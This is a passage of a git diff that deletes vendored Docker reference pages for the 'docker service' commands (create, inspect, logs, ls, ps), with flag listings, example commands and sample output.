-      --restart-max-attempts uint        Maximum number of restarts before giving up
-      --restart-window duration          Window used to evaluate the restart policy (ns|us|ms|s|m|h)
-      --secret secret                    Specify secrets to expose to the service
-      --stop-grace-period duration       Time to wait before force killing a container (ns|us|ms|s|m|h)
-  -t, --tty                              Allocate a pseudo-TTY
-      --update-delay duration            Delay between updates (ns|us|ms|s|m|h) (default 0s)
-      --update-failure-action string     Action on update failure (pause|continue) (default "pause")
-      --update-max-failure-ratio float   Failure rate to tolerate during an update
-      --update-monitor duration          Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s)
-      --update-parallelism uint          Maximum number of tasks updated simultaneously (0 to update all at once) (default 1)
-  -u, --user string                      Username or UID (format: <name|uid>[:<group|gid>])
-      --with-registry-auth               Send registry authentication details to swarm agents
-  -w, --workdir string                   Working directory inside the container
-```
-
-Creates a service as described by the specified parameters. You must run this
-command on a manager node.
-
-## Examples
-
-### Create a service
-
-```bash
-$ docker service create --name redis redis:3.0.6
-dmu1ept4cxcfe8k8lhtux3ro3
-
-$ docker service create --mode global --name redis2 redis:3.0.6
-a8q9dasaafudfs8q8w32udass
-
-$ docker service ls
-ID            NAME    MODE        REPLICAS  IMAGE
-dmu1ept4cxcf  redis   replicated  1/1       redis:3.0.6
-a8q9dasaafud  redis2  global      1/1       redis:3.0.6
-```
-
-### Create a service with 5 replica tasks (--replicas)
-
-Use the `--replicas` flag to set the number of replica tasks for a replicated
-service. The following command creates a `redis` service with `5` replica tasks:
-
-```bash
-$ docker service create --name redis --replicas=5 redis:3.0.6
-4cdgfyky7ozwh3htjfw0d12qv
-```
-
-The above command sets the *desired* number of tasks for the service. Even
-though the command returns immediately, actual scaling of the service may take
-some time. The `REPLICAS` column shows both the *actual* and *desired* number
-of replica tasks for the service.
-
-In the following example the desired state is  `5` replicas, but the current
-number of `RUNNING` tasks is `3`:
-
-```bash
-$ docker service ls
-ID            NAME   MODE        REPLICAS  IMAGE
-4cdgfyky7ozw  redis  replicated  3/5       redis:3.0.7
-```
-
-Once all the tasks are created and `RUNNING`, the actual number of tasks is
-equal to the desired number:
-
-```bash
-$ docker service ls
-ID            NAME   MODE        REPLICAS  IMAGE
-4cdgfyky7ozw  redis  replicated  5/5       redis:3.0.7
-```
-
-### Create a service with secrets
-Use the `--secret` flag to give a container access to a
-[secret](secret_create.md).
-
-Create a service specifying a secret:
-
-```bash
-$ docker service create --name redis --secret secret.json redis:3.0.6
-4cdgfyky7ozwh3htjfw0d12qv
-```
-
-Create a service specifying the secret, target, user/group ID and mode:
-
-```bash
-$ docker service create --name redis \
-    --secret source=ssh-key,target=ssh \
-    --secret source=app-key,target=app,uid=1000,gid=1001,mode=0400 \
-    redis:3.0.6
-4cdgfyky7ozwh3htjfw0d12qv
-```
-
-Secrets are located in `/run/secrets` in the container.  If no target is
-specified, the name of the secret will be used as the in memory file in the
-container.  If a target is specified, that will be the filename.  In the
-example above, two files will be created: `/run/secrets/ssh` and
-`/run/secrets/app` for each of the secret targets specified.
-
-### Create a service with a rolling update policy
-
-```bash
-$ docker service create \
-  --replicas 10 \
-  --name redis \
-  --update-delay 10s \
-  --update-parallelism 2 \
-  redis:3.0.6
-```
-
-When you run a [service update](service_update.md), the scheduler updates a
-maximum of 2 tasks at a time, with `10s` between updates. For more information,
-refer to the [rolling updates
-tutorial](https://docs.docker.com/engine/swarm/swarm-tutorial/rolling-update/).
-
-### Set environment variables (-e, --env)
-
-This sets environmental variables for all tasks in a service. For example:
-
-```bash
-$ docker service create --name redis_2 --replicas 5 --env MYVAR=foo redis:3.0.6
-```
-
-### Create a docker service with specific hostname (--hostname)
-
-This option sets the docker service containers hostname to a specific string. For example:
-```bash
-$ docker service create --name redis --hostname myredis redis:3.0.6
-```
-### Set metadata on a service (-l, --label)
-
-A label is a `key=value` pair that applies metadata to a service. To label a
-service with two labels:
-
-```bash
-$ docker service create \
-  --name redis_2 \
-  --label com.example.foo="bar"
-  --label bar=baz \
-  redis:3.0.6
-```
-
-For more information about labels, refer to [apply custom
-metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/).
-
-### Add bind-mounts or volumes
-
-Docker supports two different kinds of mounts, which allow containers to read to
-or write from files or directories on other containers or the host operating
-system. These types are _data volumes_ (often referred to simply as volumes) and
-_bind-mounts_.
-
-Additionally, Docker also supports tmpfs mounts.
-
-A **bind-mount** makes a file or directory on the host available to the
-container it is mounted within. A bind-mount may be either read-only or
-read-write. For example, a container might share its host's DNS information by
-means of a bind-mount of the host's `/etc/resolv.conf` or a container might
-write logs to its host's `/var/log/myContainerLogs` directory. If you use
-bind-mounts and your host and containers have different notions of permissions,
-access controls, or other such details, you will run into portability issues.
-
-A **named volume** is a mechanism for decoupling persistent data needed by your
-container from the image used to create the container and from the host machine.
-Named volumes are created and managed by Docker, and a named volume persists
-even when no container is currently using it. Data in named volumes can be
-shared between a container and the host machine, as well as between multiple
-containers. Docker uses a _volume driver_ to create, manage, and mount volumes.
-You can back up or restore volumes using Docker commands.
-
-A **tmpfs** mounts a tmpfs inside a container for volatile data.
-
-Consider a situation where your image starts a lightweight web server. You could
-use that image as a base image, copy in your website's HTML files, and package
-that into another image. Each time your website changed, you'd need to update
-the new image and redeploy all of the containers serving your website. A better
-solution is to store the website in a named volume which is attached to each of
-your web server containers when they start. To update the website, you just
-update the named volume.
-
-For more information about named volumes, see
-[Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/).
-
-The following table describes options which apply to both bind-mounts and named
-volumes in a service:
-
-| Option                                   | Required                  | Description
-|:-----------------------------------------|:--------------------------|:-----------------------------------------------------------------------------------------
-| **type**                                 |                           | The type of mount, can be either `volume`, `bind`, or `tmpfs`. Defaults to `volume` if no type is specified.<ul><li>`volume`: mounts a [managed volume](volume_create.md) into the container.</li><li>`bind`: bind-mounts a directory or file from the host into the container.</li><li>`tmpfs`: mount a tmpfs in the container</li></ul>
-| **src** or **source**                    | for `type=bind`&nbsp;only | <ul><li>`type=volume`: `src` is an optional way to specify the name of the volume (for example, `src=my-volume`). If the named volume does not exist, it is automatically created. If no `src` is specified, the volume is assigned a random name which is guaranteed to be unique on the host, but may not be unique cluster-wide. A randomly-named volume has the same lifecycle as its container and is destroyed when the *container* is destroyed (which is upon `service update`, or when scaling or re-balancing the service).</li><li>`type=bind`: `src` is required, and specifies an absolute path to the file or directory to bind-mount (for example, `src=/path/on/host/`).  An error is produced if the file or directory does not exist.</li><li>`type=tmpfs`: `src` is not supported.</li></ul>
-| **dst** or **destination** or **target** | yes                       | Mount path inside the container, for example `/some/path/in/container/`. If the path does not exist in the container's filesystem, the Engine creates a directory at the specified location before mounting the volume or bind-mount.
-| **readonly** or **ro**                   |                           | The Engine mounts binds and volumes `read-write` unless `readonly` option is given when mounting the bind or volume.<br /><br /><ul><li>`true` or `1` or no value: Mounts the bind or volume read-only.</li><li>`false` or `0`: Mounts the bind or volume read-write.</li></ul>
-
-#### Bind Propagation
-
-Bind propagation refers to whether or not mounts created within a given
-bind-mount or named volume can be propagated to replicas of that mount. Consider
-a mount point `/mnt`, which is also mounted on `/tmp`. The propation settings
-control whether a mount on `/tmp/a` would also be available on `/mnt/a`. Each
-propagation setting has a recursive counterpoint. In the case of recursion,
-consider that `/tmp/a` is also mounted as `/foo`. The propagation settings
-control whether `/mnt/a` and/or `/tmp/a` would exist.
-
-The `bind-propagation` option defaults to `rprivate` for both bind-mounts and
-volume mounts, and is only configurable for bind-mounts. In other words, named
-volumes do not support bind propagation.
-
-- **`shared`**: Sub-mounts of the original mount are exposed to replica mounts,
-                and sub-mounts of replica mounts are also propagated to the
-                original mount.
-- **`slave`**: similar to a shared mount, but only in one direction. If the
-               original mount exposes a sub-mount, the replica mount can see it.
-               However, if the replica mount exposes a sub-mount, the original
-               mount cannot see it.
-- **`private`**: The mount is private. Sub-mounts within it are not exposed to
-                 replica mounts, and sub-mounts of replica mounts are not
-                 exposed to the original mount.
-- **`rshared`**: The same as shared, but the propagation also extends to and from
-                 mount points nested within any of the original or replica mount
-                 points.
-- **`rslave`**: The same as `slave`, but the propagation also extends to and from
-                 mount points nested within any of the original or replica mount
-                 points.
-- **`rprivate`**: The default. The same as `private`, meaning that no mount points
-                  anywhere within the original or replica mount points propagate
-                  in either direction.
-
-For more information about bind propagation, see the
-[Linux kernel documentation for shared subtree](https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt).
-
-#### Options for Named Volumes
-The following options can only be used for named volumes (`type=volume`);
-
-| Option                | Description
-|:----------------------|:--------------------------------------------------------------------------------------------------------------------
-| **volume-driver**     | Name of the volume-driver plugin to use for the volume. Defaults to ``"local"``, to use the local volume driver to create the volume if the volume does not exist.
-| **volume-label**      | One or more custom metadata ("labels") to apply to the volume upon creation. For example, `volume-label=mylabel=hello-world,my-other-label=hello-mars`. For more information about labels, refer to [apply custom metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/).
-| **volume-nocopy**     | By default, if you attach an empty volume to a container, and files or directories already existed at the mount-path in the container (`dst`), the Engine copies those files and directories into the volume, allowing the host to access them. Set `volume-nocopy` to disables copying files from the container's filesystem to the volume and mount the empty volume.<br /><br />A value is optional:<ul><li>`true` or `1`: Default if you do not provide a value. Disables copying.</li><li>`false` or `0`: Enables copying.</li></ul>
-| **volume-opt**        | Options specific to a given volume driver, which will be passed to the driver when creating the volume. Options are provided as a comma-separated list of key/value pairs, for example, `volume-opt=some-option=some-value,some-other-option=some-other-value`. For available options for a given driver, refer to that driver's documentation.
-
-#### Options for tmpfs
-The following options can only be used for tmpfs mounts (`type=tmpfs`);
-
-| Option                | Description
-|:----------------------|:--------------------------------------------------------------------------------------------------------------------
-| **tmpfs-size**        | Size of the tmpfs mount in bytes. Unlimited by default in Linux.
-| **tmpfs-mode**        | File mode of the tmpfs in octal. (e.g. `"700"` or `"0700"`.) Defaults to ``"1777"`` in Linux.
-
-#### Differences between "--mount" and "--volume"
-
-The `--mount` flag supports most options that are supported by the `-v`
-or `--volume` flag for `docker run`, with some important exceptions:
-
-- The `--mount` flag allows you to specify a volume driver and volume driver
-    options *per volume*, without creating the volumes in advance. In contrast,
-    `docker run` allows you to specify a single volume driver which is shared
-    by all volumes, using the `--volume-driver` flag.
-
-- The `--mount` flag allows you to specify custom metadata ("labels") for a volume,
-    before the volume is created.
-
-- When you use `--mount` with `type=bind`, the host-path must refer to an *existing*
-    path on the host. The path will not be created for you and the service will fail
-    with an error if the path does not exist.
-
-- The `--mount` flag does not allow you to relabel a volume with `Z` or `z` flags,
-    which are used for `selinux` labeling.
-
-#### Create a service using a named volume
-
-The following example creates a service that uses a named volume:
-
-```bash
-$ docker service create \
-  --name my-service \
-  --replicas 3 \
-  --mount type=volume,source=my-volume,destination=/path/in/container,volume-label="color=red",volume-label="shape=round" \
-  nginx:alpine
-```
-
-For each replica of the service, the engine requests a volume named "my-volume"
-from the default ("local") volume driver where the task is deployed. If the
-volume does not exist, the engine creates a new volume and applies the "color"
-and "shape" labels.
-
-When the task is started, the volume is mounted on `/path/in/container/` inside
-the container.
-
-Be aware that the default ("local") volume is a locally scoped volume driver.
-This means that depending on where a task is deployed, either that task gets a
-*new* volume named "my-volume", or shares the same "my-volume" with other tasks
-of the same service. Multiple containers writing to a single shared volume can
-cause data corruption if the software running inside the container is not
-designed to handle concurrent processes writing to the same location. Also take
-into account that containers can be re-scheduled by the Swarm orchestrator and
-be deployed on a different node.
-
-#### Create a service that uses an anonymous volume
-
-The following command creates a service with three replicas with an anonymous
-volume on `/path/in/container`:
-
-```bash
-$ docker service create \
-  --name my-service \
-  --replicas 3 \
-  --mount type=volume,destination=/path/in/container \
-  nginx:alpine
-```
-
-In this example, no name (`source`) is specified for the volume, so a new volume
-is created for each task. This guarantees that each task gets its own volume,
-and volumes are not shared between tasks. Anonymous volumes are removed after
-the task using them is complete.
-
-#### Create a service that uses a bind-mounted host directory
-
-The following example bind-mounts a host directory at `/path/in/container` in
-the containers backing the service:
-
-```bash
-$ docker service create \
-  --name my-service \
-  --mount type=bind,source=/path/on/host,destination=/path/in/container \
-  nginx:alpine
-```
-
-### Set service mode (--mode)
-
-The service mode determines whether this is a _replicated_ service or a _global_
-service. A replicated service runs as many tasks as specified, while a global
-service runs on each active node in the swarm.
-
-The following command creates a global service:
-
-```bash
-$ docker service create \
- --name redis_2 \
- --mode global \
- redis:3.0.6
-```
-
-### Specify service constraints (--constraint)
-
-You can limit the set of nodes where a task can be scheduled by defining
-constraint expressions. Multiple constraints find nodes that satisfy every
-expression (AND match). Constraints can match node or Docker Engine labels as
-follows:
-
-| node attribute  | matches                   | example                                         |
-|:----------------|:--------------------------|:------------------------------------------------|
-| node.id         | node ID                   | `node.id == 2ivku8v2gvtg4`                      |
-| node.hostname   | node hostname             | `node.hostname != node-2`                       |
-| node.role       | node role: manager        | `node.role == manager`                          |
-| node.labels     | user defined node labels  | `node.labels.security == high`                  |
-| engine.labels   | Docker Engine's labels    | `engine.labels.operatingsystem == ubuntu 14.04` |
-
-`engine.labels` apply to Docker Engine labels like operating system,
-drivers, etc. Swarm administrators add `node.labels` for operational purposes by
-using the [`docker node update`](node_update.md) command.
-
-For example, the following limits tasks for the redis service to nodes where the
-node type label equals queue:
-
-```bash
-$ docker service create \
-  --name redis_2 \
-  --constraint 'node.labels.type == queue' \
-  redis:3.0.6
-```
-
-### Attach a service to an existing network (--network)
-
-You can use overlay networks to connect one or more services within the swarm.
-
-First, create an overlay network on a manager node the docker network create
-command:
-
-```bash
-$ docker network create --driver overlay my-network
-
-etjpu59cykrptrgw0z0hk5snf
-```
-
-After you create an overlay network in swarm mode, all manager nodes have
-access to the network.
-
-When you create a service and pass the --network flag to attach the service to
-the overlay network:
-
-```bash
-$ docker service create \
-  --replicas 3 \
-  --network my-network \
-  --name my-web \
-  nginx
-
-716thylsndqma81j6kkkb5aus
-```
-
-The swarm extends my-network to each node running the service.
-
-Containers on the same network can access each other using
-[service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery).
-
-### Publish service ports externally to the swarm (-p, --publish)
-
-You can publish service ports to make them available externally to the swarm
-using the `--publish` flag:
-
-```bash
-$ docker service create --publish <TARGET-PORT>:<SERVICE-PORT> nginx
-```
-
-For example:
-
-```bash
-$ docker service create --name my_web --replicas 3 --publish 8080:80 nginx
-```
-
-When you publish a service port, the swarm routing mesh makes the service
-accessible at the target port on every node regardless if there is a task for
-the service running on the node. For more information refer to
-[Use swarm mode routing mesh](https://docs.docker.com/engine/swarm/ingress/).
-
-### Publish a port for TCP only or UDP only
-
-By default, when you publish a port, it is a TCP port. You can
-specifically publish a UDP port instead of or in addition to a TCP port. When
-you publish both TCP and UDP ports, Docker 1.12.2 and earlier require you to
-add the suffix `/tcp` for TCP ports. Otherwise it is optional.
-
-#### TCP only
-
-The following two commands are equivalent.
-
-```bash
-$ docker service create --name dns-cache -p 53:53 dns-cache
-
-$ docker service create --name dns-cache -p 53:53/tcp dns-cache
-```
-
-#### TCP and UDP
-
-```bash
-$ docker service create --name dns-cache -p 53:53/tcp -p 53:53/udp dns-cache
-```
-
-#### UDP only
-
-```bash
-$ docker service create --name dns-cache -p 53:53/udp dns-cache
-```
-
-### Create services using templates
-
-You can use templates for some flags of `service create`, using the syntax
-provided by the Go's [text/template](http://golange.org/pkg/text/template/) package.
-
-The supported flags are the following :
-
-- `--hostname`
-- `--mount`
-- `--env`
-
-Valid placeholders for the Go template are listed below:
-
-Placeholder       | Description
------------------ | --------------------------------------------
-`.Service.ID`     | Service ID
-`.Service.Name`   | Service name
-`.Service.Labels` | Service labels
-`.Node.ID`        | Node ID
-`.Task.ID`        | Task ID
-`.Task.Name`      | Task name
-`.Task.Slot`      | Task slot
-
-#### Template example
-
-In this example, we are going to set the template of the created containers based on the
-service's name and the node's ID where it sits.
-
-```bash
-$ docker service create --name hosttempl --hostname={% raw %}"{{.Node.ID}}-{{.Service.Name}}"{% endraw %} busybox top
-va8ew30grofhjoychbr6iot8c
-
-$ docker service ps va8ew30grofhjoychbr6iot8c
-ID            NAME         IMAGE                                                                                   NODE          DESIRED STATE  CURRENT STATE               ERROR  PORTS
-wo41w8hg8qan  hosttempl.1  busybox:latest@sha256:29f5d56d12684887bdfa50dcd29fc31eea4aaf4ad3bec43daf19026a7ce69912  2e7a8a9c4da2  Running        Running about a minute ago
-
-$ docker inspect --format={% raw %}"{{.Config.Hostname}}"{% endraw %} hosttempl.1.wo41w8hg8qanxwjwsg4kxpprj
-x3ti0erg11rjpg64m75kej2mz-hosttempl
-```
-
-## Related information
-
-* [service inspect](service_inspect.md)
-* [service logs](service_logs.md)
-* [service ls](service_ls.md)
-* [service rm](service_rm.md)
-* [service scale](service_scale.md)
-* [service ps](service_ps.md)
-* [service update](service_update.md)
-
-<style>table tr > td:first-child { white-space: nowrap;}</style>
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md
deleted file mode 100644
index 8b4ab62d89..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md
+++ /dev/null
@@ -1,162 +0,0 @@
----
-title: "service inspect"
-description: "The service inspect command description and usage"
-keywords: "service, inspect"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service inspect
-
-```Markdown
-Usage:  docker service inspect [OPTIONS] SERVICE [SERVICE...]
-
-Display detailed information on one or more services
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-      --pretty          Print the information in a human friendly format.
-```
-
-
-Inspects the specified service. This command has to be run targeting a manager
-node.
-
-By default, this renders all results in a JSON array. If a format is specified,
-the given template will be executed for each result.
-
-Go's [text/template](http://golang.org/pkg/text/template/) package
-describes all the details of the format.
-
-## Examples
-
-### Inspecting a service  by name or ID
-
-You can inspect a service, either by its *name*, or *ID*
-
-For example, given the following service;
-
-```bash
-$ docker service ls
-ID            NAME   MODE        REPLICAS  IMAGE
-dmu1ept4cxcf  redis  replicated  3/3       redis:3.0.6
-```
-
-Both `docker service inspect redis`, and `docker service inspect dmu1ept4cxcf`
-produce the same result:
-
-```bash
-$ docker service inspect redis
-[
-    {
-        "ID": "dmu1ept4cxcfe8k8lhtux3ro3",
-        "Version": {
-            "Index": 12
-        },
-        "CreatedAt": "2016-06-17T18:44:02.558012087Z",
-        "UpdatedAt": "2016-06-17T18:44:02.558012087Z",
-        "Spec": {
-            "Name": "redis",
-            "TaskTemplate": {
-                "ContainerSpec": {
-                    "Image": "redis:3.0.6"
-                },
-                "Resources": {
-                    "Limits": {},
-                    "Reservations": {}
-                },
-                "RestartPolicy": {
-                    "Condition": "any",
-                    "MaxAttempts": 0
-                },
-                "Placement": {}
-            },
-            "Mode": {
-                "Replicated": {
-                    "Replicas": 1
-                }
-            },
-            "UpdateConfig": {},
-            "EndpointSpec": {
-                "Mode": "vip"
-            }
-        },
-        "Endpoint": {
-            "Spec": {}
-        }
-    }
-]
-```
-
-```bash
-$ docker service inspect dmu1ept4cxcf
-[
-    {
-        "ID": "dmu1ept4cxcfe8k8lhtux3ro3",
-        "Version": {
-            "Index": 12
-        },
-        ...
-    }
-]
-```
-
-### Inspect a service using pretty-print
-
-You can print the inspect output in a human-readable format instead of the default
-JSON output, by using the `--pretty` option:
-
-```bash
-$ docker service inspect --pretty frontend
-ID:		c8wgl7q4ndfd52ni6qftkvnnp
-Name:		frontend
-Labels:
- - org.example.projectname=demo-app
-Service Mode:	REPLICATED
- Replicas:		5
-Placement:
-UpdateConfig:
- Parallelism:	0
-ContainerSpec:
- Image:		nginx:alpine
-Resources:
-Endpoint Mode:  vip
-Ports:
- Name =
- Protocol = tcp
- TargetPort = 443
- PublishedPort = 4443
-```
-
-You can also use `--format pretty` for the same effect.
-
-
-### Finding the number of tasks running as part of a service
-
-The `--format` option can be used to obtain specific information about a
-service. For example, the following command outputs the number of replicas
-of the "redis" service.
-
-```bash{% raw %}
-$ docker service inspect --format='{{.Spec.Mode.Replicated.Replicas}}' redis
-10
-{% endraw %}```
-
-
-## Related information
-
-* [service create](service_create.md)
-* [service logs](service_logs.md)
-* [service ls](service_ls.md)
-* [service rm](service_rm.md)
-* [service scale](service_scale.md)
-* [service ps](service_ps.md)
-* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md
deleted file mode 100644
index fdf6a3a245..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md
+++ /dev/null
@@ -1,77 +0,0 @@
----
-title: "service logs (experimental)"
-description: "The service logs command description and usage"
-keywords: "service, logs"
-advisory: "experimental"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service logs
-
-```Markdown
-Usage:  docker service logs [OPTIONS] SERVICE
-
-Fetch the logs of a service
-
-Options:
-      --details        Show extra details provided to logs
-  -f, --follow         Follow log output
-      --help           Print usage
-      --since string   Show logs since timestamp
-      --tail string    Number of lines to show from the end of the logs (default "all")
-  -t, --timestamps     Show timestamps
-```
-
-The `docker service logs` command batch-retrieves logs present at the time of execution.
-
-> **Note**: this command is only functional for services that are started with
-> the `json-file` or `journald` logging driver.
-
-For more information about selecting and configuring logging drivers, refer to
-[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/).
-
-The `docker service logs --follow` command will continue streaming the new output from
-the service's `STDOUT` and `STDERR`.
-
-Passing a negative number or a non-integer to `--tail` is invalid and the
-value is set to `all` in that case.
-
-The `docker service logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants)
-, for example `2014-09-16T06:17:46.000000000Z`, to each
-log entry. To ensure that the timestamps are aligned the
-nano-second part of the timestamp will be padded with zero when necessary.
-
-The `docker service logs --details` command will add on extra attributes, such as
-environment variables and labels, provided to `--log-opt` when creating the
-service.
-
-The `--since` option shows only the service logs generated after
-a given date. You can specify the date as an RFC 3339 date, a UNIX
-timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date
-format you may also use RFC3339Nano, `2006-01-02T15:04:05`,
-`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
-timezone on the client will be used if you do not provide either a `Z` or a
-`+-00:00` timezone offset at the end of the timestamp. When providing Unix
-timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
-that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
-seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
-fraction of a second no more than nine digits long. You can combine the
-`--since` option with either or both of the `--follow` or `--tail` options.
-
-## Related information
-
-* [service create](service_create.md)
-* [service inspect](service_inspect.md)
-* [service ls](service_ls.md)
-* [service rm](service_rm.md)
-* [service scale](service_scale.md)
-* [service ps](service_ps.md)
-* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md
deleted file mode 100644
index ccd68af750..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md
+++ /dev/null
@@ -1,114 +0,0 @@
----
-title: "service ls"
-description: "The service ls command description and usage"
-keywords: "service, ls"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service ls
-
-```Markdown
-Usage:	docker service ls [OPTIONS]
-
-List services
-
-Aliases:
-  ls, list
-
-Options:
-  -f, --filter value   Filter output based on conditions provided
-      --help           Print usage
-  -q, --quiet          Only display IDs
-```
-
-This command when run targeting a manager, lists services are running in the
-swarm.
-
-On a manager node:
-```bash
-$ docker service ls
-ID            NAME      MODE        REPLICAS    IMAGE
-c8wgl7q4ndfd  frontend  replicated  5/5         nginx:alpine
-dmu1ept4cxcf  redis     replicated  3/3         redis:3.0.6
-iwe3278osahj  mongo     global      7/7         mongo:3.3
-```
-
-The `REPLICAS` column shows both the *actual* and *desired* number of tasks for
-the service.
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
-than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
-
-The currently supported filters are:
-
-* [id](service_ls.md#id)
-* [label](service_ls.md#label)
-* [name](service_ls.md#name)
-
-#### ID
-
-The `id` filter matches all or part of a service's id.
-
-```bash
-$ docker service ls -f "id=0bcjw"
-ID            NAME   MODE        REPLICAS  IMAGE
-0bcjwfh8ychr  redis  replicated  1/1       redis:3.0.6
-```
-
-#### Label
-
-The `label` filter matches services based on the presence of a `label` alone or
-a `label` and a value.
-
-The following filter matches all services with a `project` label regardless of
-its value:
-
-```bash
-$ docker service ls --filter label=project
-ID            NAME       MODE        REPLICAS  IMAGE
-01sl1rp6nj5u  frontend2  replicated  1/1       nginx:alpine
-36xvvwwauej0  frontend   replicated  5/5       nginx:alpine
-74nzcxxjv6fq  backend    replicated  3/3       redis:3.0.6
-```
-
-The following filter matches only services with the `project` label with the
-`project-a` value.
-
-```bash
-$ docker service ls --filter label=project=project-a
-ID            NAME      MODE        REPLICAS  IMAGE
-36xvvwwauej0  frontend  replicated  5/5       nginx:alpine
-74nzcxxjv6fq  backend   replicated  3/3       redis:3.0.6
-```
-
-#### Name
-
-The `name` filter matches on all or part of a service's name.
-
-The following filter matches services with a name containing `redis`.
-
-```bash
-$ docker service ls --filter name=redis
-ID            NAME   MODE        REPLICAS  IMAGE
-0bcjwfh8ychr  redis  replicated  1/1       redis:3.0.6
-```
-
-## Related information
-
-* [service create](service_create.md)
-* [service inspect](service_inspect.md)
-* [service logs](service_logs.md)
-* [service rm](service_rm.md)
-* [service scale](service_scale.md)
-* [service ps](service_ps.md)
-* [service update](service_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md
deleted file mode 100644
index 61abb15f67..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md
+++ /dev/null
@@ -1,161 +0,0 @@
----
-title: "service ps"
-description: "The service ps command description and usage"
-keywords: "service, tasks, ps"
-aliases: ["/engine/reference/commandline/service_tasks/"]
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# service ps
-
-```Markdown
-Usage:  docker service ps [OPTIONS] SERVICE
-
-List the tasks of a service
-
-Options:
-  -f, --filter filter   Filter output based on conditions provided
-      --help            Print usage
-      --no-resolve      Do not map IDs to Names
-      --no-trunc        Do not truncate output
-  -q, --quiet           Only display task IDs
-```
-
-Lists the tasks that are running as part of the specified service. This command
-has to be run targeting a manager node.
-
-## Examples
-
-### Listing the tasks that are part of a service
-
-The following command shows all the tasks that are part of the `redis` service:
-
-```bash
-$ docker service ps redis
-
-ID             NAME      IMAGE        NODE      DESIRED STATE  CURRENT STATE          ERROR  PORTS
-0qihejybwf1x   redis.1   redis:3.0.5  manager1  Running        Running 8 seconds
-bk658fpbex0d   redis.2   redis:3.0.5  worker2   Running        Running 9 seconds
-5ls5s5fldaqg   redis.3   redis:3.0.5  worker1   Running        Running 9 seconds
-8ryt076polmc   redis.4   redis:3.0.5  worker1   Running        Running 9 seconds
-1x0v8yomsncd   redis.5   redis:3.0.5  manager1  Running        Running 8 seconds
-71v7je3el7rr   redis.6   redis:3.0.5  worker2   Running        Running 9 seconds
-4l3zm9b7tfr7   redis.7   redis:3.0.5  worker2   Running        Running 9 seconds
-9tfpyixiy2i7   redis.8   redis:3.0.5  worker1   Running        Running 9 seconds
-3w1wu13yupln   redis.9   redis:3.0.5  manager1  Running        Running 8 seconds
-8eaxrb2fqpbn   redis.10  redis:3.0.5  manager1  Running        Running 8 seconds
-```
-
-In addition to _running_ tasks, the output also shows the task history. For
-example, after updating the service to use the `redis:3.0.6` image, the output
-may look like this:
-
-```bash
-$ docker service ps redis
-
-ID            NAME         IMAGE        NODE      DESIRED STATE  CURRENT STATE                   ERROR  PORTS
-50qe8lfnxaxk  redis.1      redis:3.0.6  manager1  Running        Running 6 seconds ago
-ky2re9oz86r9   \_ redis.1  redis:3.0.5  manager1  Shutdown       Shutdown 8 seconds ago
-3s46te2nzl4i  redis.2      redis:3.0.6  worker2   Running        Running less than a second ago
-nvjljf7rmor4   \_ redis.2  redis:3.0.6  worker2   Shutdown       Rejected 23 seconds ago        "No such image: redis@sha256:6…"
-vtiuz2fpc0yb   \_ redis.2  redis:3.0.5  worker2   Shutdown       Shutdown 1 second ago
-jnarweeha8x4  redis.3      redis:3.0.6  worker1   Running        Running 3 seconds ago
-vs448yca2nz4   \_ redis.3  redis:3.0.5  worker1   Shutdown       Shutdown 4 seconds ago
-jf1i992619ir  redis.4      redis:3.0.6  worker1   Running        Running 10 seconds ago
-blkttv7zs8ee   \_ redis.4  redis:3.0.5  worker1   Shutdown       Shutdown 11 seconds ago
-```
-
-The number of items in the task history is determined by the
-`--task-history-limit` option that was set when initializing the swarm. You can
-change the task history retention limit using the
-[`docker swarm update`](swarm_update.md) command.
-
